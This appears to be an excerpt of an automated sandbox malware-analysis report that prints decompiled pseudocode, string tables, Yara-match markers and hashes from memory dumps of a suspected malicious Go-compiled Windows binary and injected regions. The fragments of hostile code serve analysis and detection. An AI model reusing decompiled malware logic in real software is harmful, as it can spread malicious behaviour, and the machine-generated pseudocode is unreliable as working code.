                                                                                                                            																	E013513C0(_t158, _t167, _t169, _t172, _t194, _t215, _t229, _t242, _t255, _t269);
                                                                                                                            																	_t156 = 0x22;
                                                                                                                            																	_t229 = _v80;
                                                                                                                            																	_t255 = 0x13880c8;
                                                                                                                            																	r9d = 0xe;
                                                                                                                            																	_t265 = _t215;
                                                                                                                            																	_t215 = 0x138ccfa;
                                                                                                                            																	E01345F80(_t152, _t172, _t194, 0x138ccfa, _t222, _v80, _v112, _t242, 0x13880c8, _t258, _t194, _t265, _t268, _t269);
                                                                                                                            																	E01330BA0(_t194, 0x138ccfa, _t242);
                                                                                                                            																	goto L51;
                                                                                                                            																} else {
                                                                                                                            																	L19:
                                                                                                                            																	_t167 =  *(_t233 + 0x14) & 0x000000ff;
                                                                                                                            																	if((dil & 0x00000001) == 0) {
                                                                                                                            																		_t152 = 0x38;
                                                                                                                            																	} else {
                                                                                                                            																		_t152 = 0x48;
                                                                                                                            																	}
                                                                                                                            																	if(_t222 <= 0) {
                                                                                                                            																		L49:
                                                                                                                            																		E013588C0();
                                                                                                                            																		goto L50;
                                                                                                                            																	} else {
                                                                                                                            																		L23:
                                                                                                                            																		_t231 =  *((intOrPtr*)(_t233 + _t215));
                                                                                                                            																		_v96 = _t231;
                                                                                                                            																		if(_t231 != _t194) {
                                                                                                                            																			L24:
                                                                                                                            																			r8d =  *(_t231 + 0x17) & 0x000000ff;
                                                                                                                            																			r8d = r8d & 0x0000001f;
                                                                                                                            																			if(r8b == 0x16) {
                                                                                                                            																				L29:
                                                                                                                            																				_t212 = _t231;
                                                                                                                            																				_t147 = E01351460(_t114, _t212);
                                                                                                                            																				if(_t212 != 0) {
                                                                                                                            																					_t213 = _v88;
                                                                                                                            																					E01351460(_t147, _t213);
                                                                                                                            																					_t158 = _t158 & 0xffffff00 | _t213 == 0x00000000;
                                                                                                                            																				} else {
                                                                                                                            																					_t158 = 1;
                                                                                                                            																				}
                                                                                                                            																				if(_t158 == 0) {
                                                                                                                            																					goto L47;
                                                                                                                            																				}
                                                                                                                            																				L33:
                                                                                                                            																				_t228 = _v96;
                                                                                                                            																				_t215 =  *((intOrPtr*)(_t228 + 0x30));
                                                                                                                            																				_t194 = _v88;
                                                                                                                            																				if( *((intOrPtr*)(_t194 + 0x30)) != _t215) {
                                                                                                                            																					goto L46;
                                                                                                                            																				}
                                                                                                                            																				L34:
                                                                                                                            																				_t233 = _v104;
                                                                                                                            																				_t231 = _t228;
                                                                                                                            																			} else {
                                                                                                                            																				L25:
                                                                                                                            																				if(r8b != 0x14) {
                                                                                                                            																					L46:
                                                                                                                            																					E013513C0(_t158, _t167, _t169, _t172, _t194, _t215, _t231, _t242, _t255, _t269);
                                                                                                                            																					_v80 = _t194;
                                                                                                                            																					_v112 = _t215;
                                                                                                                            																					_t202 = _v104;
                                                                                                                            																					E013513C0(_t158, _t167, _t169, _t172, _v104, _t215, _t231, _t242, _t255, _t269);
                                                                                                                            																					_t158 = 0x22;
                                                                                                                            																					_t231 = _v80;
                                                                                                                            																					_t255 = 0x13880c8;
                                                                                                                            																					r9d = 0xe;
                                                                                                                            																					_t266 = _t215;
                                                                                                                            																					_t215 = 0x138ccfa;
                                                                                                                            																					E01345F80(_t152, _t172, _v104, 0x138ccfa, _t222, _v80, _v112, _t242, 0x13880c8, _t258, _t202, _t266, _t268, _t269);
                                                                                                                            																					E01330BA0(_t202, 0x138ccfa, _t242);
                                                                                                                            																					L47:
                                                                                                                            																					_t194 = _v88;
                                                                                                                            																					goto L46;
                                                                                                                            																				}
                                                                                                                            																				L26:
                                                                                                                            																				if( *((long long*)(_t231 + 0x40)) != 0) {
                                                                                                                            																					L27:
                                                                                                                            																					_t215 = _a8;
                                                                                                                            																					_t214 = _t231;
                                                                                                                            																					_t222 = _t224;
                                                                                                                            																					E01309240(_t167, _t172, _t214, _t215, _t222, _t231, _t242, _t255, _t258, _t269);
                                                                                                                            																					if(_t214 == 0) {
                                                                                                                            																						L48:
                                                                                                                            																						_t194 = _v88;
                                                                                                                            																						goto L46;
                                                                                                                            																					}
                                                                                                                            																					L28:
                                                                                                                            																					_t194 = _v88;
                                                                                                                            																					_t233 = _v104;
                                                                                                                            																					_t231 = _v96;
                                                                                                                            																				}
                                                                                                                            																			}
                                                                                                                            																		}
                                                                                                                            																		L35:
                                                                                                                            																		if(( *(_t233 + 0x14) & 1) == 0) {
                                                                                                                            																		}
                                                                                                                            																		_t152 =  *(_t233 + 0x30) & 0x0000ffff;
                                                                                                                            																		_t166 = ( *(_t233 + 0x32) & 0x7fff) + _t152;
                                                                                                                            																		_t236 = _t233 + _t222;
                                                                                                                            																		_t158 = ( *(_t233 + 0x32) & 0x7fff) + _t152 & 0x0000ffff;
                                                                                                                            																		if(_t215 > _t222) {
                                                                                                                            																			L45:
                                                                                                                            																			L01358980();
                                                                                                                            																			goto L46;
                                                                                                                            																		}
                                                                                                                            																		L39:
                                                                                                                            																		_t223 = _t222 - _t215;
                                                                                                                            																		_t51 = _t215 - 0x100000; // -1048576
                                                                                                                            																		_t218 = _t215 << 0x00000003 & _t51 >> 0x0000003f;
                                                                                                                            																		_t227 = _t236 + _t218;
                                                                                                                            																		L43:
                                                                                                                            																		while(_t218 < _t223) {
                                                                                                                            																			_t257 =  *((intOrPtr*)(_t227 + _t218 * 8));
                                                                                                                            																			_t218 = _t218 + 1;
                                                                                                                            																			r9d =  *(_t257 + 0x15) & 0x000000ff;
                                                                                                                            																			_t238 = _t236 + _t258;
                                                                                                                            																			_t258 =  ~_t258;
                                                                                                                            																			_t236 = (_t238 - 0x00000001 & _t258) +  *_t257;
                                                                                                                            																		}
                                                                                                                            																		_v120 = _t236;
                                                                                                                            																		E01313AC0(_t158, _t242, _t269);
                                                                                                                            																		asm("inc esp");
                                                                                                                            																		asm("inc esp");
                                                                                                                            																		asm("inc esp");
                                                                                                                            																		_v56 = E013145E0;
                                                                                                                            																		_v48 =  &_a8;
                                                                                                                            																		_v40 =  &_a24;
                                                                                                                            																		_v32 = _v120 + 0x00000007 & 0xfffffff8;
                                                                                                                            																		_v24 = _v96;
                                                                                                                            																		_v16 = _v88;
                                                                                                                            																		 *_t249 =  &_v56;
                                                                                                                            																		_t146 = E013560C0(0, _t158, _t166, _t167, 0, _t171, _t172, _t189, _t242, _t259, _t263, _t268, _t269, _t274);
                                                                                                                            																		asm("inc ebp");
                                                                                                                            																		return _t146;
                                                                                                                            																	}
                                                                                                                            																}
                                                                                                                            															}
                                                                                                                            														}
                                                                                                                            													}
                                                                                                                            												} else {
                                                                                                                            													L13:
                                                                                                                            													goto L53;
                                                                                                                            												}
                                                                                                                            											}
                                                                                                                            										}
                                                                                                                            									} else {
                                                                                                                            										L6:
                                                                                                                            										_t219 = _a16;
                                                                                                                            										_t224 = 0x14cf4f8;
                                                                                                                            										if(_t219 == 0x14cf4f8) {
                                                                                                                            											L8:
                                                                                                                            											return __eax;
                                                                                                                            										} else {
                                                                                                                            											L7:
                                                                                                                            											_t199 = 0x146a760;
                                                                                                                            											L55:
                                                                                                                            											if(_t199 == 0) {
                                                                                                                            												L66:
                                                                                                                            												E01330BA0(0x138e9d5, _t215, _t242);
                                                                                                                            												goto L67;
                                                                                                                            											} else {
                                                                                                                            												L56:
                                                                                                                            												_t224 = _t219;
                                                                                                                            												if( *((intOrPtr*)(_t199 + 0xc0)) > _t219 ||  *((intOrPtr*)(_t199 + 0xc8)) <= _t219) {
                                                                                                                            													L58:
                                                                                                                            													if( *((intOrPtr*)(_t199 + 0xd0)) > _t219 ||  *((intOrPtr*)(_t199 + 0xd8)) <= _t219) {
                                                                                                                            														L60:
                                                                                                                            														if( *((intOrPtr*)(_t199 + 0xe0)) > _t219) {
                                                                                                                            															L63:
                                                                                                                            															if( *((intOrPtr*)(_t199 + 0xf0)) > _t219 ||  *((intOrPtr*)(_t199 + 0xf8)) <= _t219) {
                                                                                                                            																L54:
                                                                                                                            																_t199 =  *((intOrPtr*)(_t199 + 0x220));
                                                                                                                            																_t219 = _t224;
                                                                                                                            																goto L55;
                                                                                                                            															} else {
                                                                                                                            																goto L65;
                                                                                                                            															}
                                                                                                                            														} else {
                                                                                                                            															L61:
                                                                                                                            															if( *((intOrPtr*)(_t199 + 0xe8)) > _t219) {
                                                                                                                            																goto L65;
                                                                                                                            															} else {
                                                                                                                            																L62:
                                                                                                                            																goto L63;
                                                                                                                            															}
                                                                                                                            														}
                                                                                                                            													} else {
                                                                                                                            														goto L65;
                                                                                                                            													}
                                                                                                                            												} else {
                                                                                                                            													L65:
                                                                                                                            													return _t114;
                                                                                                                            												}
                                                                                                                            											}
                                                                                                                            										}
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L71:
                                                                                                                            					L70:
                                                                                                                            					_a8 = _t190;
                                                                                                                            					_a16 = _t215;
                                                                                                                            					_a24 = _t219;
                                                                                                                            					_a32 = _t229;
                                                                                                                            					E01356200(_t224, _t242);
                                                                                                                            				}
                                                                                                                            			}





























































                                                                                                                            0x01314455
                                                                                                                            0x0131445d
                                                                                                                            0x01314462
                                                                                                                            0x01314469
                                                                                                                            0x01314472
                                                                                                                            0x01314477
                                                                                                                            0x01314480
                                                                                                                            0x01314485
                                                                                                                            0x00000000
                                                                                                                            0x013140cb
                                                                                                                            0x013140cb
                                                                                                                            0x013140cb
                                                                                                                            0x013140d3
                                                                                                                            0x013143c5
                                                                                                                            0x013143c5
                                                                                                                            0x013143ca
                                                                                                                            0x013143d2
                                                                                                                            0x013143d7
                                                                                                                            0x013143e0
                                                                                                                            0x013143e5
                                                                                                                            0x013143ea
                                                                                                                            0x013143f7
                                                                                                                            0x013143fe
                                                                                                                            0x01314407
                                                                                                                            0x0131440c
                                                                                                                            0x01314413
                                                                                                                            0x01314418
                                                                                                                            0x00000000
                                                                                                                            0x013140d9
                                                                                                                            0x013140d9
                                                                                                                            0x013140d9
                                                                                                                            0x013140e4
                                                                                                                            0x013140ed
                                                                                                                            0x013140e6
                                                                                                                            0x013140e6
                                                                                                                            0x013140e6
                                                                                                                            0x013140f5
                                                                                                                            0x013143bc
                                                                                                                            0x013143c0
                                                                                                                            0x00000000
                                                                                                                            0x013140fb
                                                                                                                            0x013140fb
                                                                                                                            0x013140fb
                                                                                                                            0x013140ff
                                                                                                                            0x01314107
                                                                                                                            0x0131410d
                                                                                                                            0x0131410d
                                                                                                                            0x01314112
                                                                                                                            0x0131411a
                                                                                                                            0x01314162
                                                                                                                            0x01314162
                                                                                                                            0x01314165
                                                                                                                            0x0131416d
                                                                                                                            0x01314176
                                                                                                                            0x01314180
                                                                                                                            0x01314188
                                                                                                                            0x0131416f
                                                                                                                            0x0131416f
                                                                                                                            0x0131416f
                                                                                                                            0x0131418d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01314193
                                                                                                                            0x01314193
                                                                                                                            0x01314198
                                                                                                                            0x0131419c
                                                                                                                            0x013141a5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013141ab
                                                                                                                            0x013141ab
                                                                                                                            0x013141b0
                                                                                                                            0x01314120
                                                                                                                            0x01314120
                                                                                                                            0x01314124
                                                                                                                            0x0131435a
                                                                                                                            0x0131435a
                                                                                                                            0x0131435f
                                                                                                                            0x01314367
                                                                                                                            0x0131436c
                                                                                                                            0x01314371
                                                                                                                            0x01314376
                                                                                                                            0x0131437b
                                                                                                                            0x01314388
                                                                                                                            0x0131438f
                                                                                                                            0x01314398
                                                                                                                            0x0131439d
                                                                                                                            0x013143a4
                                                                                                                            0x013143a9
                                                                                                                            0x013143ae
                                                                                                                            0x013143ae
                                                                                                                            0x00000000
                                                                                                                            0x013143ae
                                                                                                                            0x0131412a
                                                                                                                            0x0131412f
                                                                                                                            0x01314135
                                                                                                                            0x01314135
                                                                                                                            0x0131413d
                                                                                                                            0x01314140
                                                                                                                            0x01314143
                                                                                                                            0x0131414b
                                                                                                                            0x013143b5
                                                                                                                            0x013143b5
                                                                                                                            0x00000000
                                                                                                                            0x013143b5
                                                                                                                            0x01314151
                                                                                                                            0x01314151
                                                                                                                            0x01314156
                                                                                                                            0x0131415b
                                                                                                                            0x0131415b
                                                                                                                            0x0131412f
                                                                                                                            0x0131411a
                                                                                                                            0x013141b3
                                                                                                                            0x013141ba
                                                                                                                            0x013141ba
                                                                                                                            0x013141d2
                                                                                                                            0x013141d6
                                                                                                                            0x013141d8
                                                                                                                            0x013141db
                                                                                                                            0x013141e3
                                                                                                                            0x01314353
                                                                                                                            0x01314355
                                                                                                                            0x00000000
                                                                                                                            0x01314355
                                                                                                                            0x013141e9
                                                                                                                            0x013141e9
                                                                                                                            0x013141ec
                                                                                                                            0x013141fb
                                                                                                                            0x013141fe
                                                                                                                            0x00000000
                                                                                                                            0x01314296
                                                                                                                            0x01314279
                                                                                                                            0x0131427d
                                                                                                                            0x01314280
                                                                                                                            0x01314285
                                                                                                                            0x0131428d
                                                                                                                            0x01314293
                                                                                                                            0x01314293
                                                                                                                            0x0131429b
                                                                                                                            0x013142a0
                                                                                                                            0x013142a5
                                                                                                                            0x013142ae
                                                                                                                            0x013142b7
                                                                                                                            0x013142c7
                                                                                                                            0x013142d7
                                                                                                                            0x013142e7
                                                                                                                            0x013142fc
                                                                                                                            0x01314309
                                                                                                                            0x01314316
                                                                                                                            0x01314326
                                                                                                                            0x0131432a
                                                                                                                            0x0131432f
                                                                                                                            0x01314352
                                                                                                                            0x01314352
                                                                                                                            0x013140f5
                                                                                                                            0x013140d3
                                                                                                                            0x013140c5
                                                                                                                            0x013140a8
                                                                                                                            0x01314082
                                                                                                                            0x01314082
                                                                                                                            0x00000000
                                                                                                                            0x01314082
                                                                                                                            0x01314080
                                                                                                                            0x01314069
                                                                                                                            0x0131401d
                                                                                                                            0x0131401d
                                                                                                                            0x0131401d
                                                                                                                            0x01314025
                                                                                                                            0x0131402f
                                                                                                                            0x0131403d
                                                                                                                            0x0131404c
                                                                                                                            0x01314031
                                                                                                                            0x01314031
                                                                                                                            0x01314031
                                                                                                                            0x013144d8
                                                                                                                            0x013144db
                                                                                                                            0x01314542
                                                                                                                            0x0131454e
                                                                                                                            0x00000000
                                                                                                                            0x013144dd
                                                                                                                            0x013144dd
                                                                                                                            0x013144dd
                                                                                                                            0x013144e7
                                                                                                                            0x013144f2
                                                                                                                            0x013144f9
                                                                                                                            0x01314509
                                                                                                                            0x01314510
                                                                                                                            0x01314520
                                                                                                                            0x01314527
                                                                                                                            0x013144ce
                                                                                                                            0x013144ce
                                                                                                                            0x013144d5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01314512
                                                                                                                            0x01314512
                                                                                                                            0x01314519
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01314519
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000

                                                                                                                            Strings
                                                                                                                            • nil elem type!no module datano such devicepollCache.lockprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunsafe.Pointerwinapi error #work.ful, xrefs: 01314553
                                                                                                                            • , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMeroitic_CursiveNetApiBufferFreeOpen, xrefs: 0131449D
                                                                                                                            • runtime.SetFinalizer: cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceattempt to clear non-e, xrefs: 0131439D, 0131440C, 01314477
                                                                                                                            • , not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_GondiMapViewOfFileMasaram_GondiMende_KikakuiOld_HungarianRegDeleteKeyWRegEnumKeyExWRegEnumValueWRegOpenKeyExWRtlMoveMemoryVirtualUnlockWriteConsoleWbad flushGen bad map state, xrefs: 01314575
                                                                                                                            • to finalizer untyped args -thread limitCertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker initGetConsoleModeGetProcAddressGetUserNameExWMB; allocated NetUserGetInfoOther_ID_StartPattern_SyntaxProcess32NextWQuotatio, xrefs: 01314388, 013143F7, 01314462
                                                                                                                            • because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMappingWCuba Standard TimeFiji Standard TimeGetComputerNameExWGetExitCodeProcessGetFileAttributesWGetModuleFileNameWIran Sta, xrefs: 0131443C
                                                                                                                            • runtime.SetFinalizer: pointer not at beginning of allocated blockcannot convert slice with length %y to pointer to array with length %xtoo many concurrent operations on a single file or socket (max 1048575)QueryPerformanceFrequency syscall returned zero, runni, xrefs: 013144BD
                                                                                                                            • runtime.SetFinalizer: first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=unfinished open-coded defers in deferreturnun, xrefs: 01314595
                                                                                                                            • runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt baseunexpected call to os.Exit(0) during testacquireSudog: , xrefs: 013144AC
                                                                                                                            • runtime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type attempted to add zero-sized address rangebinary: varint over, xrefs: 01314584
                                                                                                                            • runtime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetcompileCallback: argument size is larger than uintpt, xrefs: 01314542
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • API String ID: 0-1099859943
                                                                                                                            • Opcode ID: fb285ec4960ae5c3ae62f09f9a91cbec809ec28cbdd2edcd919d5c6ec6d246e3
                                                                                                                            • Instruction ID: 7a896c31bfe0a96b4235a384f8e44441062bbf0d74b19bb856ebc6fdeebf4a18
                                                                                                                            • Opcode Fuzzy Hash: fb285ec4960ae5c3ae62f09f9a91cbec809ec28cbdd2edcd919d5c6ec6d246e3
                                                                                                                            • Instruction Fuzzy Hash: ACE19B32609B85C2EB649F59F4403AEB7A4F784B88F888526DB8D17B59DF3CD095CB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            • debugCal, xrefs: 01305772
                                                                                                                            • l819, xrefs: 013058E8
                                                                                                                            • debugCall2048exchange fullfatal error: gethostbynamegetservbynamelevel 3 resetload64 failedmin too largenil stackbaseout of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: but progSize, xrefs: 01305861
                                                                                                                            • call from within the Go runtimecannot assign requested addresscasgstatus: bad incoming valuescheckmark found unmarked objectentersyscallblock inconsistent internal error - misuse of itabmalformed time zone informationnon in-use span in unswept listpacer: sweep, xrefs: 01305934, 01305942
                                                                                                                            • debugCal, xrefs: 013058C0
                                                                                                                            • call from unknown functioncorrupted semaphore ticketentersyscall inconsistent forEachP: P did not run fnfreedefer with d.fn != nilinitSpan: unaligned lengthinvalid request descriptorname not unique on networkno CSI structure availableno message of desired type, xrefs: 013056CD, 013056D9
                                                                                                                            • debugCal, xrefs: 01305713
                                                                                                                            • debugCal, xrefs: 013057DC
                                                                                                                            • call not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreach, xrefs: 013059AD, 013059B9
                                                                                                                            • debugCal, xrefs: 0130587F
                                                                                                                            • runtime., xrefs: 0130590F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • API String ID: 0-948186835
                                                                                                                            • Opcode ID: a38d8753542de797544b83cad16e3757bb9c43471e6cc0690cb233aba41b347b
                                                                                                                            • Instruction ID: 16bcb3d17fe196a51d516661c6e81694f5818676f489f29666e26e7217965eb6
                                                                                                                            • Opcode Fuzzy Hash: a38d8753542de797544b83cad16e3757bb9c43471e6cc0690cb233aba41b347b
                                                                                                                            • Instruction Fuzzy Hash: 4C817376605788C5EE278B0DD060369BBE4F389BACF58D416CB4A43BA5EB78C585CF01
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1812809483-0
                                                                                                                            • Opcode ID: d95c7a9a2c17d7a8e9f5c47f13abea7a60952c142b5a5079d9c101ee9c9769dd
                                                                                                                            • Instruction ID: 32268aeeda6cc50ee421abba3e2aad979f94e95b5756a22c949b72382e462a9d
                                                                                                                            • Opcode Fuzzy Hash: d95c7a9a2c17d7a8e9f5c47f13abea7a60952c142b5a5079d9c101ee9c9769dd
                                                                                                                            • Instruction Fuzzy Hash: 0F510633514E1A4AEF66AB188C4E3B973E2EB14333F74422AB455C79D5E734EC428269
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A89B30(void* __edx, intOrPtr* __rax, void* __rcx, void* __rdx) {
                                                                                                                            				void* _t1;
                                                                                                                            
                                                                                                                            				r9d = 0;
                                                                                                                            				if ( *0xf8aa3ab8 != r9d) goto 0xf8a89bb9;
                                                                                                                            				if (__rcx != 0) goto 0xf8a89b65;
                                                                                                                            				_t1 = E0000025B25BF8A7B89C(__rax);
                                                                                                                            				 *__rax = 0x16;
                                                                                                                            				E0000025B25BF8A7BEC4(_t1);
                                                                                                                            				return 0x7fffffff;
                                                                                                                            			}





                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1812809483-0
                                                                                                                            • Opcode ID: b6ec1a0d66ab53b6d553519bfce0c2bda9e21283b74d3cf7fdb0c3fc1606eba2
                                                                                                                            • Instruction ID: 694246047876d302abc54948f0364ca4273ec14dce48acd7e3ed8a6445473014
                                                                                                                            • Opcode Fuzzy Hash: b6ec1a0d66ab53b6d553519bfce0c2bda9e21283b74d3cf7fdb0c3fc1606eba2
                                                                                                                            • Instruction Fuzzy Hash: 9E41E2B3600A508AFF62AB11AC4C3AD76E1E754BB7F784125FB5443EC5D73688419738
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2464146582-0
                                                                                                                            • Opcode ID: 66a6b6c1bf5ba65b1d7d9ec8d345855fa95ce804db8e647d6f2a022bd571f430
                                                                                                                            • Instruction ID: f182d32c71bbbf5e12929f1719272eb54b6046668d9908e61065dfb7eec72c46
                                                                                                                            • Opcode Fuzzy Hash: 66a6b6c1bf5ba65b1d7d9ec8d345855fa95ce804db8e647d6f2a022bd571f430
                                                                                                                            • Instruction Fuzzy Hash: 8621F333608A004EFB166B28DC4E3783691EB86332F25020DF056C75E3DB749851827E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2140805544-0
                                                                                                                            • Opcode ID: c7e16f6995ac432e7f399cb2b3602af33cbdf35393ed5024deaedf5a6a5ff7ed
                                                                                                                            • Instruction ID: 7edae16a06721ce6f21ffb4ea6d4a91bab15998558fadb4e8c727da46eb8902a
                                                                                                                            • Opcode Fuzzy Hash: c7e16f6995ac432e7f399cb2b3602af33cbdf35393ed5024deaedf5a6a5ff7ed
                                                                                                                            • Instruction Fuzzy Hash: D921A133509E044EFF166B249C8E3697692EB46332F31955CF81AC79E3D77488408379
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 56%
                                                                                                                            			E0000025B25BF8A81838(signed int __ebx, signed int __ecx, void* __edx, void* __edi, signed int* __rax, long long __rbx, void* __rdx, signed int _a8, long long _a16) {
                                                                                                                            				void* __rdi;
                                                                                                                            				void* __rsi;
                                                                                                                            				void* _t21;
                                                                                                                            				void* _t35;
                                                                                                                            				signed long long _t40;
                                                                                                                            				signed long long _t41;
                                                                                                                            				signed long long _t45;
                                                                                                                            				signed long long _t53;
                                                                                                                            
                                                                                                                            				_a16 = __rbx;
                                                                                                                            				_a8 = __ecx;
                                                                                                                            				r14d = r8d;
                                                                                                                            				if (__edi != 0xfffffffe) goto 0xf8a81873;
                                                                                                                            				E0000025B25BF8A7B82C(__rax);
                                                                                                                            				 *__rax =  *__rax & 0x00000000;
                                                                                                                            				E0000025B25BF8A7B89C(__rax);
                                                                                                                            				 *__rax = 9;
                                                                                                                            				goto 0xf8a81905;
                                                                                                                            				if (__ecx < 0) goto 0xf8a818ed;
                                                                                                                            				_t35 = __edi -  *0xf8aa7384;
                                                                                                                            				if (_t35 >= 0) goto 0xf8a818ed;
                                                                                                                            				_t53 = __ecx >> 5;
                                                                                                                            				_t45 = __ecx * 0x58;
                                                                                                                            				if (_t35 == 0) goto 0xf8a818ed;
                                                                                                                            				E0000025B25BF8A83FA8(__ebx & 0x0000001f, __edi, _t45, __ecx, _t53);
                                                                                                                            				_t40 =  *((intOrPtr*)(0xf8aa3200 + _t53 * 8));
                                                                                                                            				if (( *(_t40 + _t45 + 8) & 0x00000001) == 0) goto 0xf8a818ca;
                                                                                                                            				r8d = r14d;
                                                                                                                            				E0000025B25BF8A8191C(__ebx & 0x0000001f, __edi, _t40, _t45, __rdx, _t53);
                                                                                                                            				goto 0xf8a818e1;
                                                                                                                            				E0000025B25BF8A7B89C(_t40);
                                                                                                                            				 *_t40 = 9;
                                                                                                                            				E0000025B25BF8A7B82C(_t40);
                                                                                                                            				 *_t40 =  *_t40 & 0x00000000;
                                                                                                                            				0xf8a84408();
                                                                                                                            				_t41 = _t40 | 0xffffffff;
                                                                                                                            				goto 0xf8a81909;
                                                                                                                            				E0000025B25BF8A7B82C(_t41);
                                                                                                                            				 *_t41 =  *_t41 & 0x00000000;
                                                                                                                            				_t21 = E0000025B25BF8A7B89C(_t41);
                                                                                                                            				 *_t41 = 9;
                                                                                                                            				return E0000025B25BF8A7BEC4(_t21);
                                                                                                                            			}












                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4140391395-0
